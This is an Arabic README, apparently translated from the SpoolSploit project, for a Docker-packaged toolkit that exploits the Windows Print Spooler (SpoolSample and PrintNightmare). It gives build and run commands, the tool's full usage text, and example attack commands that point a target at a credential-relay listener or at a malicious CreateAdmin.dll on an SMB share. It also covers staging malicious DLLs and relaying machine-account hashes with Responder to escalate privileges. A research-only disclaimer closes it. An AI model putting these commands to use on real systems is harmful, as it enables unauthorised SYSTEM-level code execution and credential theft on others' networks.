
مجموعة من ثغرات طابعة Windows المستغلة معبأة في حاويات مع أدوات أخرى للاستغلال العملي.
مجموعة من استغلالات مدير الطباعة في Windows معبأة في حاويات مع أدوات أخرى للاستغلال العملي.
SpoolSploit هي مجموعة من استغلالات مدير الطباعة في Windows معبأة في حاويات مع أدوات أخرى للاستغلال العملي. بعض الطرق الفعالة للغاية تتمثل في إعادة توجيه بيانات اعتماد حساب الجهاز لرفع الامتيازات وتنفيذ DLLs ضارة على نقاط النهاية بصلاحية الوصول الكامل للنظام.

اعتبارًا من تاريخ الإصدار، تم اختبار حاوية Docker الخاصة بـ SpoolSploit بنجاح على أحدث إصدارات MacOS وUbuntu Linux وWindows 10.
على الرغم من أنه ليس مطلوبًا، إلا أنه إذا كنت ترغب في استضافة DLLs ضارة أو إجراء هجمات إعادة توجيه بيانات الاعتماد، كل ذلك داخل حاوية SpoolSploit، فيجب عليك التأكد من أن المنفذ 445 غير مستخدم على المضيف الذي يعمل عليه Docker. هذا الأمر أكثر شيوعًا عند تشغيل هذه الحاوية على مضيف Windows، حيث إنه يستخدم المنفذ 445 افتراضيًا. إذا كان تعطيل المنفذ 445 على مضيفك غير عملي، فلا بأس! يمكنك ببساطة تشغيل حاوية docker في جهاز افتراضي تم تكوين محول الشبكة فيه بوضع الجسر. سيسمح هذا بتقديم DLLs ضارة وإعادة توجيه بيانات الاعتماد. إذا كنت ترغب فقط في تقديم DLLs ضارة، يمكنك ببساطة استضافة DLLs على مشاركة وصول مجهولة على نظام التشغيل المضيف الخاص بك أو على مشاركة خادم مخترق.
git clone https://github.com/BeetleChunks/SpoolSploit
cd SpoolSploit
sudo docker build -t spoolsploit .
sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
sudo docker exec -it spoolsploit /bin/bash
usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD
optional arguments:
-h, --help show this help message and exit
-a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
Attack type to execute on target(s).
-rH RHOST, --rhost RHOST
Remote target IP, CIDR range, or filename (file:<path>)
-rP {139,445}, --rport {139,445}
Remote SMB server port.
-lH LHOST, --lhost LHOST
Listening hostname or IP
-lS LSHARE, --lshare LSHARE
Staging SMB share (UNC)
-d DOMAIN, --domain DOMAIN
Domain for authentication
-u USER, --username USER
Username for authentication
-p PASSWD, --password PASSWD
Password for authentication
Example - spoolsample:
python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
Example - nightmare:
python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
تحتوي حاوية SpoolSploit Docker على Responder لإعادة توجيه تجزئات حساب الجهاز التي تم الحصول عليها من تنفيذ هجوم spoolsample في SpoolSploit. نظرًا لوجود عدة مقالات رائعة تفصل عملية إعادة توجيه بيانات اعتماد حساب الجهاز المميزة لرفع الامتيازات، لن أدخل في تلك التفاصيل هنا.
مضمن في حاوية SpoolSploit خادم SMB تم تنفيذه عبر Impacket. يمكن استخدام هذا الخادم لاستضافة DLLs ضارة عند تنفيذ هجوم printnightmare في SpoolSploit. تعمل إعدادات خادم SMB الافتراضية، ولكن إذا كنت ترغب في تخصيصها، يمكنك تعديل ملف التكوين الموجود في /home/dlogmas/smbserver/smb-v1.conf.
الشيء الوحيد الذي عليك فعله هو نسخ ملف DLL الخاص بك إلى مجلد المشاركة الخاص بخادم SMB في حاوية SpoolSploit. مسار المشاركة في الحاوية هو /home/dlogmas/smbserver/share/. توضح الأوامر التالية كيفية تحميل ملف DLL إلى حاوية SpoolSploit وجعله متاحًا لخادم SMB.
sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'
تم إنشاء هذا الكود البرهاني للأغراض البحثية الأكاديمية وليس المقصود استخدامه ضد الأنظمة إلا في حالة التصريح بذلك صراحة. يتم توفير الكود كما هو دون أي ضمانات أو وعود بشأن تنفيذه. أنا لست مسؤولاً أو ملزماً عن سوء استخدام هذا الكود.